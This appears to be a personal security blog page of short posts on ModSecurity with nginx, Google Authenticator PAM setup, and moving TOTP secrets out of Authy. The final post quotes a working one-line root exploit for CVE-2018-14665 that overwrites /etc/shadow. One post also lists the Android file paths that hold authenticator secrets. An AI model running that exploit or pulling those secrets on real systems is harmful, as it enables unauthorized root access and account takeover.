I wanted to make note of this page, because it was a huge help getting the ModSecurity OWASP rule set working with nginx.
LinuxBabe: How to Set Up ModSecurity with Nginx on Debian/Ubuntu
Then to start exempting specific pages from specific rule IDâs, youâll using these three commands quite a bit:
`tailf /var/log/modsec_audit.log`
`sudo nano /etc/nginx/modsec/coreruleset-3.3.4/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf`
`sudo nginx -t`
`sudo systemctl reload nginx`
I’ve had a tab with this site open in my browser for weeks so I don’t forget to go to it, but still haven’t had time to sit down & go through it, to see what I might want to try. So I might as well drop it here as a reminder & in case anyone else wants to check it out.
Dergnz: Fun things to try with your Flipper Zero (and wifi devboard)
I came across this while configure some local services using nginx, & wanted to make note of it: Mozilla SSL Configuration Generator.
Source: Malwarebytes Labs: Relax. Internet password books are OK
So this was posted on April Fools’ Day, but I do believe it’s a serious post & I agree with the content. The author brings up the point early: Whether using a physical password book is a good thing depends on your threat model & risk. If you are not good with computers & can’t figure out how to use a password manager (see some of my other posts about passwords: Donât Change that Pa$$w0rd, FINALLY: A Good Password Management Article, & ANOTHER GOOD article about passwords) & you don’t have to worry about someone you live with abusing access to the book, then this is a great way to store passwords without remembering them or re-using the same one over & over. Having the details saved in a book that’s kept in a drawer at your desk is a good way for some people to store different passwords. And it would obviously stay safer if the book stays at home, versus keeping it with you at all times & potentially losing it while out & about. That of course leads to other questions like “What do I do if I am away from home & need a password?”, but that will have to be answered by the user: Is it worth carrying the book with you at all times or is it really something that can wait until you get home & can access the book.
Source: The Hacker News: Google Reveals What Personal Data Chrome and Its Apps Collect On You
And this is why I avoid using Chrome where possible:
This is definitely not the first time I’ve tried getting this working, but glad I was finally able to. Looks like if I had read a bit more, I never would have run into issues…
By the second or third time I ran into problems, I at least figured out why: with my home directory being encrypted, the “secret” 2FA files could not be accessed & verified.
Now for the fun part… It looks like Google had the instructions for encrypted home directories in the README the whole time.
Encrypted home directories
If your system encrypts home directories until after your users entered their password, you either have to re-arrange the entries in the PAM configuration file to decrypt the home directory prior to asking for the OTP code, or you have to store the secret file in a non-standard location:auth required pam_google_authenticator.so secret=/var/unencrypted-home/${USER}/.google_authenticator
would be a possible choice. Make sure to set appropriate permissions. You also have to tell your users to manually move their .google_authenticator file to this location.
In addition to “${USER}”, the secret= option also recognizes both “~” and ${HOME} as short-hands for the user’s home directory.
When using the secret= option, you might want to also set the user= option. The latter forces the PAM module to switch to a dedicated hard-coded user id prior to doing any file operations. When using the user= option, you must not include “~” or “${HOME}” in the filename.
The user= option can also be useful if you want to authenticate users who do not have traditional UNIX accounts on your system.
So, after getting through that tedious “reading” thing, I followed their suggestion, & created the “unencrypted-home” directory, moved the ~/.google_authenticator file there, edited /etc/pam.d/common-auth & included the path to the file at the encrypted location. After that… Working as expected!
user@Hostname:~$ cat /etc/pam.d/common-auth | tail -n 1
auth required pam_google_authenticator.so secret=/var/unencrypted-home/${USER}/.google_authenticator
I actually forget what web site this one, but found this little gem while trying to setup a new account:
No, I didn’t actually make my password “password123” but I would have thought a site warning my against it wouldn’t allow “password”+< something >. The fact that it wouldn’t accept my random password probably should have been my first hint that it was not going to go well.
Despite the convenience of having Authy’s ability to sync across devices, I decided I wanted to change my 2FA app to Android’s andOTP. To do this (without unenrolling & re-enrolling myself in 2FA for my 50+ services), I needed to find a way to export my secrets from Authy. I did find a few posts on the topic, but didn’t have any luck with those guides. Most seemed to be a variation on the same process of getting the secrets from the Authy Chrome extension.
GitHubGist:Â Generating Authy passwords on other authenticators
What IÂ did end up finding that finally worked, was to pull the XML containing details on each entry in Authy, thanks to this post: GBATemp:Â extract your totp keys from authy using chrome:
Good job, this tutorial is great for people who need to extract their keys out of Authy without needing a rooted Android/Jailbroken iPhone to grab them from the mobile app.
For people with rooted Android phones, the totp keys are stored here:
The filepath is what I was looking for
/data/data/com.authy.authy/shared_prefs/com.authy.storage.tokens.authenticator.xml
In the past, when I was using Google Authenticator, you had the ability to pull the database from the Android app, assuming you were rooted. The above process seems to be similar, just for the Authy app, instead of Google Authenticator:Â /data/data/com.google.android.apps.authenticator2/databases/databases.
This post is for my own reference, & for anyone else that may want to move from Authy, to another authenticator app.
I just came across this video (posted yesterday), where scammers are leveraging Microsoft’s legitimate support site at https://support.microsoft.com/help. This was after I received a fake Microsoft support call. Unfortunately, I didn’t have a dummy VM ready to waste their time, but glad I found out about the use of Microsoft’s site. Because Microsoft uses LogMeIn, their support site seems to just forward the code to LogMeIn to start the session.
See the video below for how the site is used:
Hacker Fantastic has another Tweet-able exploit for a system:
#CVE-2018-14665 – a LPE exploit via https://t.co/eax3fvaAjE fits in a tweet
Twitter: @HackerFantastic
cd /etc; Xorg -fp “root::16431:0:99999:7:::” -logfile shadow :1;su
Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.â Hacker Fantastic (@hackerfantastic) October 25, 2018
![v3 Cube [PNG]](https://i0.wp.com/v3ritas.tech/wp-content/uploads/2018/06/v3-Cube-1.png?fit=300%2C300&ssl=1)